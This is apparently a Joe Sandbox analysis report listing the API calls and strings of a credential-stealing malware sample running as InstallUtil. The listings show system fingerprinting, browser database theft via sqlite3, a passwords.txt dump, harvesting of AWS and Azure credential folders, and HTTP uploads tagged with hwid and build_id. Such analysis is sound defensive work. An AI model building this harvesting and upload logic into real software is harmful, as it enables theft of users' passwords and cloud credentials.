                                                                                                                    • Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                    • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                                    • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                                    • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                                    • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                                    • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                    • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                    • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                    • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                                    • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                                    • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                    • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                    • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                    • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                    • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                                    • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                                    • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                                    • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                                    • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                                    • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                                    • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                                    • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
                                                                                                                    • Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472
                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                  • API String ID: 3634126619-1014693891
                                                                                                                  • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                  • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                                  • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                                  • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                    • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                    • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                  • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                  • API String ID: 2840494320-4129404369
                                                                                                                  • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                  • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                  • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                  • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                  • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                  • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                  • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                  • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                  • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                  • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                  • String ID: passwords.txt
                                                                                                                  • API String ID: 1956182324-347816968
                                                                                                                  • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                  • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                  • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                  • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                  • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                  • API String ID: 3006978581-858375883
                                                                                                                  • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                  • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                  • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                  • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                  • wsprintfW.USER32 ref: 004016BC
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                  • _time64.MSVCRT ref: 0040170E
                                                                                                                  • srand.MSVCRT ref: 00401715
                                                                                                                  • rand.MSVCRT ref: 0040171E
                                                                                                                  • _memset.LIBCMT ref: 0040172E
                                                                                                                  • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                  • _memset.LIBCMT ref: 00401763
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                  • _memset.LIBCMT ref: 004017BE
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                  • String ID: %s%s$delays.tmp
                                                                                                                  • API String ID: 1620473967-1413376734
                                                                                                                  • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                  • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                  • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                  • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004164E2
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                    • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                    • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                  • _memset.LIBCMT ref: 00416556
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                    • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                    • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                    • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                    • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                  • _memset.LIBCMT ref: 004165CA
                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                  • _memset.LIBCMT ref: 0041663E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                  • API String ID: 780282842-974132213
                                                                                                                  • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                  • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                  • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                  • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                  • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                  • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                  • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1956182324-0
                                                                                                                  • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                  • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                  • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                  • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                    • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                    • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                  • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                    • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                    • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                    • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                    • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
